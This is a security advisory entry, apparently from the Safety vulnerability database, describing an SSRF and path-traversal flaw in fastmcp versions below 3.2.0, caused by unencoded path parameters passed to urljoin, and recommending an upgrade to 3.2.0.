PyPI: fastmcp

CVE-2026-32871

Safety vulnerability ID: SFTY-20260331-24057

Safety legacy ID: pyup.io-91326

Affected versions of the fastmcp package are vulnerable to Server-Side Request Forgery (SSRF) and Path Traversal due to improper path parameter handling in URL construction. Specifically, fastmcp/utilities/openapi/director.py implements RequestDirector._build_url() by directly substituting untrusted path parameter values into path_template without URL-encoding, then passing the result to urllib.parse.urljoin(), which normalizes dot-dot-slash traversal sequences and allows the final request path to escape the intended API prefix.

PythonPyPINVDNVDGitHubGHSA
Created at: Apr 10, 2026Updated at: Apr 10, 2026

Overview

FastMCP OpenAPI Provider has an SSRF & Path Traversal Vulnerability

Advisory

Affected versions of the fastmcp package are vulnerable to Server-Side Request Forgery (SSRF) and Path Traversal due to improper path parameter handling in URL construction. Specifically, fastmcp/utilities/openapi/director.py implements RequestDirector._build_url() by directly substituting untrusted path parameter values into path_template without URL-encoding, then passing the result to urllib.parse.urljoin(), which normalizes dot-dot-slash traversal sequences and allows the final request path to escape the intended API prefix.

Affected Package

Affecting fastmcp package, versions
<3.2.0

Also affects

---

How to Fix

Upgrade
fastmcp
to
3.2.0
or higher.

Mitigation and Workarounds

---

Vulnerable Functions

Functions linked to known vulnerabilities.

Vulnerable function data is available for Enterprise customers

Book a call with us to see Safety in action.

References

Safety

Verified by Safety

Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.

Learn more